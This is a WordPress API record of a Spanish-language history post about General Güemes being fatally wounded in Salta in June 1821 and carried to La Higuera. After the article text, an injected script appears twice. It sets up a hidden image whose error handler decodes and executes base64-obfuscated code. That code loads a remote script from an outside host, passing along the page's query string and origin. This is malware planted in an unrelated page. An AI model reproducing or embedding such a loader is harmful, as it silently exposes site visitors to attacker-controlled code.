{"id":2704,"date":"2023-06-08T08:44:18","date_gmt":"2023-06-08T11:44:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2704"},"modified":"2025-08-14T00:15:35","modified_gmt":"2025-08-14T03:15:35","slug":"un-dia-como-hoy-en-la-noche-del-7-junio-de-1821es-herido-de-muerte-el-gral-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2704","title":{"rendered":"Un d\u00eda como hoy: en la noche del 7 Junio de 1821es herido de muerte el Gral G\u00fcemes"},"content":{"rendered":"\n<p><br>\ud83d\udd34\u26abEn la noche del 7 de Junio de 1821 en la esquina de Belgrano y Balcarce de la ciudad de Salta, G\u00fcemes es herido y sale en busca de un refugio junto a sus gauchos, el h\u00e9roe no cae de sus silla y con su caballo, cruza el campo de la Cruz y penetrando en la quebrada de Chachapoya se dirigi\u00f3 hacia el este hasta una posta que exist\u00eda como a 8 Km. de la Ciudad de Salta, en la Lagunilla, conocida como de Da. Pancha Luna. El Cnel. Dn. Eusebio Mollinedo (quien lo acompa\u00f1aba en ese d\u00eda fat\u00eddico), cuenta en sus escritos que: \u201c\u2026Herido gravemente en la columna vertebral por un disparo de arma de fuego de una partida enemiga y luego de padecer dolores lacerantes que sobrellev\u00f3 con la entereza de su car\u00e1cter forjado en las vicisitudes de la guerra, llegamos a la posta de La Lagunilla\u2026 All\u00ed fue asistido y sirvi\u00f3 de descanso\u201d. Desde ese lugar se mand\u00f3 avisar al Cmte. R\u00edos, que esperaba con el resto de la escolta en el Tincunaco, para que informara de la situaci\u00f3n a las fuerzas acampadas en el campo de Velarde y se incorporara a la partida, adem\u00e1s se notifica al Presb\u00edtero Dn. Francisco Fern\u00e1ndez, de la situaci\u00f3n que se encontraba el general herido.<\/p>\n\n\n\n<p><br>El  Comandante R\u00edos y sus soldados, como as\u00ed tambi\u00e9n del Pbro. Fern\u00e1ndez, improvisaron una camilla para transportar a G\u00fcemes herido y continuaron la marcha en direcci\u00f3n de la finca \u201cLas Higuerillas\u201d. Este camino solo presenta unas lomadas que se superan con facilidad y luego el camino es llano sin accidentes, hacia la sala de la finca.<\/p>\n\n\n\n<p><br>Llegaron sin mayores inconvenientes a la casa de la sala, esperaron la llegada de un parte importante de las tropas patriotas y de la partida del Cap. Cabral que conduc\u00eda al m\u00e9dico Dr. Antonio Castellanos. All\u00ed el Gral. G\u00fcemes recibi\u00f3 los primeros cuidados m\u00e9dicos.<\/p>\n\n\n\n<p><br>El Dr. Castellanos pudo hacer el diagn\u00f3stico de la gravedad de la herida y comenzar a pensar que la misma era de muy mal pron\u00f3stico.<br>Ya mas organizados y con mayores elementos, vieron los presentes la necesidad de poner a salvo del enemigo al General Herido, por lo cual reanudaron la marcha por la \u201cCa\u00f1ada de la Higuera\u201d, en direcci\u00f3n del puesto de la \u201cHiguera\u201d. \u201c\u2026en el paraje de la \u201cHiguera\u201d, cuatro leguas al Sureste del punto de partida, pero muy desfallecido por la p\u00e9rdida de sangre\u2026\u201d<\/p>\n\n\n\n<p><br>La situaci\u00f3n de este puesto era muy segura y estrat\u00e9gica, porque a espaldas y corta distancia se comunica con las fincas de \u201cLa Cruz\u201d y \u201cLa Quesera\u201d lugares donde G\u00fcemes ten\u00eda los campos de enterramiento para sus gauchos.<br>Pero en su grave estado el H\u00e9roe no puede avanzar mas y bajo la sombra de un Cebil espera el inexorable destino pero con la entereza de quien da la Vida por La Patria. De esta manera el M\u00e1rtir de nuestra Naci\u00f3n comenzar\u00eda el camino a la Inmortalidad.<br>En imagen G\u00fcemes herido.<br>Informe de Juan Oscar Wayar.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udd34\u26abEn la noche del 7 de Junio de 1821 en la esquina de Belgrano y Balcarce de la ciudad de Salta, G\u00fcemes es herido y sale en busca de un refugio junto a sus gauchos, el h\u00e9roe no cae de sus silla y con su caballo, cruza el campo de la Cruz y penetrando en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2705,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2704","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2704"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2704"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2704\/revisions"}],"predecessor-version":[{"id":7065,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2704\/revisions\/7065"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2705"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}